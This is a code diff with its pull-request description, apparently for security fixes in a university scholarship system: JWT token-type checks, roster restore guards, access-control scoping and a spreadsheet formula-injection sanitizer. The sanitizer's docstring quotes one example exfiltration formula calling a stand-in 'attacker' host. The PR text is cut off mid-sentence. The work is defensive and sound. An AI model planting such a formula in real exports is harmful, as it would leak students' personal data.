+async def _seed_user(db: AsyncSession) -> User:
+    user = User(
+        nycu_id="jwt_type_user",
+        name="JWT Type User",
+        email="jwt_type_user@nycu.edu.tw",
+        user_type=UserType.student,
+        role=UserRole.student,
+    )
+    db.add(user)
+    await db.commit()
+    await db.refresh(user)
+    return user
+
+
+async def test_security_get_current_user_rejects_refresh_token(db: AsyncSession):
+    user = await _seed_user(db)
+    refresh = create_refresh_token({"sub": str(user.id)})
+    creds = HTTPAuthorizationCredentials(scheme="Bearer", credentials=refresh)
+    with pytest.raises(AuthenticationError):
+        await security_get_current_user(credentials=creds, db=db)
+
+
+async def test_security_get_current_user_accepts_access_token(db: AsyncSession):
+    user = await _seed_user(db)
+    access = create_access_token({"sub": str(user.id)})
+    creds = HTTPAuthorizationCredentials(scheme="Bearer", credentials=access)
+    resolved = await security_get_current_user(credentials=creds, db=db)
+    assert resolved.id == user.id
+
+
+async def test_deps_get_current_user_rejects_refresh_token(db: AsyncSession):
+    user = await _seed_user(db)
+    refresh = create_refresh_token({"sub": str(user.id)})
+    with pytest.raises(HTTPException):
+        await deps_get_current_user(token=refresh, db=db)
+
+
+async def test_deps_get_current_user_accepts_access_token(db: AsyncSession):
+    user = await _seed_user(db)
+    access = create_access_token({"sub": str(user.id)})
+    resolved = await deps_get_current_user(token=access, db=db)
+    assert resolved.id == user.id

--- a/backend/app/tests/test_payment_rosters_api.py
+++ b/backend/app/tests/test_payment_rosters_api.py
@@ -633,6 +633,10 @@ def locked_roster_with_removed_item(sync_db_for_rosters):
     """
     from datetime import datetime, timezone
 
+    from app.models.application import Application, ApplicationStatus
+    from app.models.enums import ReviewStage
+    from app.models.scholarship import SubTypeSelectionMode
+
     u = User(
         nycu_id="admin_rmrest",
         email="admin_rmrest@nycu.edu.tw",
@@ -643,6 +647,23 @@ def locked_roster_with_removed_item(sync_db_for_rosters):
     sync_db_for_rosters.add(u)
     sync_db_for_rosters.commit()
     sync_db_for_rosters.refresh(u)
+
+    # restore_item (#1081-K) now re-reads the item's application status, so the
+    # item must point at a real, still-approved application for the happy-path
+    # restore to succeed.
+    appn = Application(
+        user_id=u.id,
+        app_id="APP-PR-RMREST-001",
+        scholarship_type_id=1,
+        academic_year=114,
+        semester="first",
+        status=ApplicationStatus.approved,
+        review_stage=ReviewStage.student_draft,
+        sub_type_selection_mode=SubTypeSelectionMode.single,
+    )
+    sync_db_for_rosters.add(appn)
+    sync_db_for_rosters.commit()
+    sync_db_for_rosters.refresh(appn)
 
     r = PaymentRoster(
         roster_code="ROSTER-PR-RMREST",
@@ -666,7 +687,7 @@ def locked_roster_with_removed_item(sync_db_for_rosters):
 
     item = PaymentRosterItem(
         roster_id=r.id,
-        application_id=1,
+        application_id=appn.id,
         student_id_number="PR-RMREST-001",
         student_name="Restore Test Student",
         scholarship_name="Test Scholarship",

--- a/backend/app/tests/test_roster_item_removal_service.py
+++ b/backend/app/tests/test_roster_item_removal_service.py
@@ -276,6 +276,13 @@ def test_restore_item_reincludes_and_audits(db_sync, locked_roster_two_items, ad
 
     roster = locked_roster_two_items
     target = roster.items[0]
+    # restore_item (#1081-K) only re-includes items whose application is still
+    # approved. The shared fixture's application is cancelled/revoked, so put it in
+    # the legitimate state this happy-path represents (the item was genuinely
+    # re-approved and should be restored).
+    app = db_sync.get(Application, target.application_id)
+    app.status = ApplicationStatus.approved
+    db_sync.flush()
     svc = RosterService(db_sync)
     svc.remove_item_from_locked_roster(roster.id, target.id, admin_db_user_sync.id, "繳回")
 
@@ -329,3 +336,19 @@ def test_restore_item_not_found_raises(db_sync, locked_roster_two_items, admin_d
     svc = RosterService(db_sync)
     with pytest.raises(NotFoundError):  # missing item → 404
         svc.restore_item(roster.id, 99999999, admin_db_user_sync.id, "x")
+
+
+def test_restore_item_rejects_non_approved_application(db_sync, locked_roster_two_items, admin_db_user_sync):
+    """SECURITY (#1081-K): an item whose application is no longer approved
+    (withdrawn / rejected / revoked) must not be restorable — restoring it would
+    silently re-inflate the student's received_months (PhD 36-month cap)."""
+    import pytest
+
+    roster = locked_roster_two_items
+    target = roster.items[0]
+    # The shared fixture leaves the application in `cancelled` (revoked) state.
+    assert db_sync.get(Application, target.application_id).status == ApplicationStatus.cancelled
+    svc = RosterService(db_sync)
+    svc.remove_item_from_locked_roster(roster.id, target.id, admin_db_user_sync.id, "繳回")
+    with pytest.raises(ValueError):
+        svc.restore_item(roster.id, target.id, admin_db_user_sync.id, "誤刪回復")

--- a/backend/app/utils/excel_security.py
+++ b/backend/app/utils/excel_security.py
@@ -1,0 +1,35 @@
+"""Excel export hardening helpers.
+
+Shared utilities to neutralize stored spreadsheet formula injection (CSV/Excel
+injection) when exporting user-influenced data into ``.xlsx`` files that staff
+later download and open.
+"""
+
+from typing import Any
+
+# Leading characters that make Excel / LibreOffice interpret a cell as a formula.
+_FORMULA_TRIGGERS = frozenset({"=", "+", "-", "@"})
+# Leading control characters some spreadsheet apps also treat specially.
+_CONTROL_TRIGGERS = frozenset({"\t", "\r", "\n"})
+
+
+def excel_safe_cell_value(value: Any) -> Any:
+    """Neutralize spreadsheet formula injection in an exported cell value.
+
+    A string beginning with ``=``, ``+``, ``-``, ``@`` (or a leading tab/CR/LF) is
+    promoted to a live formula cell by Excel / LibreOffice when the file is opened.
+    Student- or other low-privilege-controlled free text written verbatim into an
+    ``.xlsx`` a reviewer later opens can therefore run e.g.
+    ``=WEBSERVICE("https://attacker/x?d="&TEXTJOIN(",",TRUE,N:N))`` — referencing
+    the whole sheet, not just the attacker's own row — to exfiltrate the cohort's
+    PII columns. Prefixing such strings with an apostrophe forces the cell to be
+    treated as literal text; the apostrophe is not shown to the reader.
+
+    Non-string values (int, float, None, datetime, ...) are returned unchanged so
+    numeric/typed cells keep their native type.
+    """
+    if not isinstance(value, str) or not value:
+        return value
+    if value[0] in _FORMULA_TRIGGERS or value[0] in _CONTROL_TRIGGERS:
+        return "'" + value
+    return value


### PR DESCRIPTION
## Summary
This PR addresses 11 distinct security vulnerabilities across authentication, authorization, and data export layers. The fixes range from closing unauthenticated privilege escalation paths to preventing formula injection in Excel exports and enforcing proper access controls on sensitive endpoints.

## Key Changes

### Authentication & Token Security (#1079)
- **Gate mock SSO endpoints**: `POST /auth/register` and `POST /auth/login` now return 404 when `ENABLE_MOCK_SSO=false`, closing an unauthenticated privilege escalation path where any username could be registered with `super_admin` role or logged in without a password
- **Reject refresh tokens in access-token contexts**: Both `app.core.security.get_current_user` and `app.core.deps.get_current_user` now validate the JWT `type` claim, rejecting refresh tokens (7-day expiry) where access tokens are expected
- **Add regression tests** for both auth vulnerabilities with mock SSO enabled/disabled scenarios

### Excel/CSV Formula Injection (#1081-G)
- **New `excel_safe_cell_value()` utility**: Neutralizes spreadsheet formula injection by apostrophe-prefixing strings starting with `=`, `+`, `-`, `@`, or control characters (tab/CR/LF)
- **Apply to all Excel exports**: Updated `whitelist_excel_service.py`, `excel_export_service.py`, and `college_ranking_export_service.py` to sanitize user-influenced text (names, IDs, notes, remarks) before writing to `.xlsx` files
- **Add comprehensive regression tests** proving payloads like `=WEBSERVICE(...)` are neutralized and openpyxl treats them as literal text, not formulas

### Review Data Access Control (#1081-B)
- **Scope review endpoints to authorized users**: 
  - `GET /reviews/{review_id}` now validates the parent application is viewable by the caller
  - `GET /applications/{id}/reviews` and `GET /applications/{id}/review-status` use new `ApplicationService.get_viewable_application()` to prevent enumeration of another applicant's reviewer identity, recommendations, and comments
- **Implement `get_viewable_application()` helper** with consistent access rules: students see only their own, professors see assigned applications, college/admin/super_admin see any

### College Ranking Access Control (#1081-C, #1081-D)
- **Scope ranking endpoints to owning college**: `GET /rankings/{id}/distribution-details` and `GET /rankings/{id}/roster-status` now load the ranking's `college_code` and authorize via `assert_can_manage_ranking()` before returning sensitive applicant PII and rejection reasons
- **Prevent cross-college enumeration**: Return 404 (not 403) on authorization failure so attackers cannot distinguish "no such ranking" from "not your college"

### College Student Preview Access Control (#1081-E)
- **Gate SIS lookup by college membership**: `GET /college/students/{student_id}/preview` now verifies the student has an application belonging to the caller's college BEFORE querying the SIS system, preventing cross-college PII leaks and student-existence oracles

### Application Document Access Control (#1081-F)
- **Require professor-student advising relationship**: Professors downloading application documents via `GET /applications/{id}/document` must now have an active `ProfessorStudentRelationship` with `can_view_applications=true`, matching the sibling `files.py` proxy enforcement

### Professor Review Submission & Editing (#1081-A)
- **Enforce assignment + terminal-reject lock on multi-role endpoint**: `POST /reviews` now applies the same assignment, review-window, and terminal-reject-lock checks that `professor.py::submit_professor_review` enforces, preventing professors from rejecting unassigned applications or reversing their own terminal rejects
- **Apply same guards to professor review edits**: `PUT /reviews/{id}` now re-checks `can_professor_submit_review()` and `assert_professor_review_unlocked()` to prevent editing after college review starts

### College Ranking Import Deadline Enforcement (#1081-H)
- **Gate ranking

https://claude.ai/code/session_01HGKQPjD7m2p1SPyNdN7q6o